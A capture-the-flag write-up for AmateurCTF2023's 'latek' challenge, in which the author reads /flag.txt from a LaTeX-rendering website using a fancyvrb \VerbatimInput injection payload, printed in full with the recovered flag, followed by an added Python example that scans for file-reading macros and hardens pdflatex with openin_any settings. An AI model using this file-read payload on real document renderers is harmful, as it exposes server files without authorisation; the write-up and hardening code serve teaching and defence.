
CTFs | AmateurCTF2023 | latek

Latek

I haven’t tried much in this CTF, so this is the only WU that I will write. For this challenge, we need to recover the /flag.txt file.


As we can see, we have access to a website that prints what is written in the LaTeX input on the left:


I tried some basic injections found on PayloadsAllTheThings, like \input{/flag.txt}, but this didn’t work as expected. After a bit of research, I found this StackExchange post. I then used the following payload:

\documentclass{article}
\usepackage[dvipsnames]{xcolor}
\usepackage{fancyvrb}
% redefine \VerbatimInput
\RecustomVerbatimCommand{\VerbatimInput}{VerbatimInput}%
{fontsize=\footnotesize,
 %
 frame=lines,  % top and bottom rule only
 framesep=2em, % separation between frame and text
 rulecolor=\color{Gray},
 %
 label=\fbox{\color{Black}data.txt},
 labelposition=topline,
 %
 commandchars=\|\(\), % escape character and argument delimiters for
                      % commands within the verbatim
 commentchar=*        % comment character
}
\begin{document}
\VerbatimInput{/flag.txt}
\end{document}

And this gave me the flag: amateursCTF{th3_l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t_all0w_rc3_sadly}
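For anyone operating a renderer like this one, here is an added example (not part of the original write-up or the challenge's code) of closing the file read at the engine level: `openin_any=p` makes kpathsea refuse absolute and parent-directory paths whichever macro asks for them, and the name scan is only an advisory log signal. The function names, the macro list and the `input.tex` job name are assumptions made for this sketch.

```python
import os
import re
import subprocess

# File-reading macros that take a brace argument (LaTeX kernel, verbatim,
# fancyvrb, listings). Constructed for this example, not exhaustive.
READ_MACROS = ("input", "include", "verbatiminput", "VerbatimInput",
               "BVerbatimInput", "LVerbatimInput", "lstinputlisting")
READ_RE = re.compile(
    r"\\(" + "|".join(READ_MACROS) + r")\s*(?:\[[^\]]*\])?\s*\{([^}]*)\}")

# Constructed sample: the read from the payload above plus a benign include.
SAMPLE = r"""\usepackage{fancyvrb}
\input{chapters/intro}
\VerbatimInput{/flag.txt}
"""


def risky_reads(source):
    """Return (macro, path) pairs whose path is absolute or climbs out of
    the job directory. Advisory only: TeX can build macro names at run
    time, so enforcement belongs in the engine settings below."""
    hits = []
    for macro, path in READ_RE.findall(source):
        path = path.strip()
        if path.startswith(("/", "~")) or ".." in path.split("/"):
            hits.append((macro, path))
    return hits


def hardened_invocation(tex_name="input.tex"):
    """Command and environment for compiling untrusted input. tex_name is
    relative; the caller runs it with cwd set to a throwaway job directory."""
    cmd = ["pdflatex", "-no-shell-escape", "-interaction=nonstopmode",
           "-halt-on-error", tex_name]
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        "openin_any": "p",   # kpathsea: no absolute paths, no "..", no dotfiles
        "openout_any": "p",  # same restriction for files TeX writes
    }
    return cmd, env


def compile_untrusted(jobdir, tex_name="input.tex", timeout=20):
    """Run the engine inside jobdir (assumes pdflatex is installed)."""
    cmd, env = hardened_invocation(tex_name)
    return subprocess.run(cmd, cwd=jobdir, env=env, timeout=timeout,
                          capture_output=True, text=True)
```

The same two settings can be made permanent in `texmf.cnf` instead of the process environment.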


This post is licensed under CC BY 4.0 by the author.